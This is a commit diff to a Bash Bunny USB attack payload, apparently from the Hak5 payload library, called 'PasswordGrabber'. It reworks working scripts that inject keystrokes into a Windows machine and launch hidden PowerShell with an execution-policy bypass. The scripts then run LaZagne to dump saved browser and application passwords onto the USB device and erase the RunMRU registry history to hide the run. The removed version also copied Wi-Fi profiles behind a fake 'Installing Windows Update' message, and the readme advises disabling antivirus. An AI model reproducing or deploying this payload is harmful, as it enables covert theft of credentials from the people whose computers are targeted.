Payload updates (#309)

payloads/library/credentials/PasswordGrabber/d.cmd

@@ -1,4 +0,0 @@
-@echo off
-start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-cscript %~dp0\i.vbs %~dp0\e.cmd
-@exit

payloads/library/credentials/PasswordGrabber/e.cmd

@@ -1,24 +0,0 @@
-@echo off
-@echo Installing Windows Update
-
-setlocal
-cd /d %~dp0
-
-REM Time and Date
-set drec=%COMPUTERNAME%_%date%_%TIME: =0%
-set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
-mkdir %dst% >>nul
-
-REM This executes LaZagne in the current directory and outputs the password file to Loot
-%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
-
-
-if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
-xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
-)
-
-REM Blink CAPSLOCK key
-start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-
-@cls
-@exit

payloads/library/credentials/PasswordGrabber/i.vbs

@@ -1 +0,0 @@
-CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

payloads/library/credentials/PasswordGrabber/payload.ps1

@@ -0,0 +1,5 @@
+$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
+$filter = 'password_'+ $env:COMPUTERNAME
+$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
+Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

payloads/library/credentials/PasswordGrabber/payload.txt

@@ -1,19 +1,33 @@
 #!/bin/bash
 #
 # Title:         Password Grabber
-# Author:        Razerblade
-# Version:       1.2
-# Target:        Windows
-# Props:         Hak5Darren, TeCHemically, dragmus31
+# Description:   Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 
+#                This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. 
+#                This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
+# Author:        jdebetaz
+# Props:         Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
+# Version:       1.1
 # Category:      Credentials
-#
-# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
-# which in turn executes e.cmd invisibly using i.vbs
-# which in turn steals credentials by using LaZagne and saves them to /Loot
-#
+# Target:        Windows
+# Attackmodes:   HID, STORAGE
+
+# Options
+LOOTDIR=/root/udisk/loot/PasswordGrabber
+
+######## INITIALIZATION ########
 LED SETUP
 GET SWITCH_POSITION
-LED ATTACK
 ATTACKMODE HID STORAGE
-RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
-LED FINISH
+
+######## MAKE LOOT DIRECTORY ########
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+
+######## ATTACK ########
+LED ATTACK
+RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
+# Wait until passwords are grabbed.
+sleep 10
+
+######## FINISH ########
+LED FINISH

payloads/library/credentials/PasswordGrabber/readme.md

@@ -1,40 +1,35 @@
 # PasswordGrabber
 
-* Author: RazerBlade
-* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
-* Version: Version 1.2
-* Firmware support: 1.1+
-* Target: Windows 7+
+* Author: [jdebetaz](https://github.com/jdebetaz)
+* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade
+* Version: 1.3
+* Frimware support: 1.1 and higher
+* Target version: Windows 7 and higher
 
 ## Description
+Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
 
-Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
-This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
-This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
-
-Full read here: https://github.com/AlessandroZ/LaZagne
-Downloads here: https://github.com/AlessandroZ/LaZagne/releases
-
+Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
 
 ## Configuration
-1. You need to download the latest file from LaZagnes release page. 
-2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
-3. Plug it in a computer and PWN them.
+1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases).
+2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe
+3. Plug your BashBunny and Enjoy
 
-Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
+Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
 
-## INFO
-By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
+## Info
+jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
 
-## DISCLAIMER
-Hak5 is not responsible for the execution of 3rd party binaries.
-## STATUS
+RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
 
-| LED                | Status                                       |
-| ------------------ | -------------------------------------------- |
-| Red                | Attack Setup                                 |
-| Green              | Attack Complete                              |
+## Disclaimer
+__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
 
-## Discussion
-[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
+## Led status
 
+| LED                                           | Status |
+|-----------------------------------------------|--------|
+| Magenta solid                                 | Setup  |
+| Yellow single blink                           | Attack |
+| Green 1000ms VERYFAST blink followed by SOLID | Finish |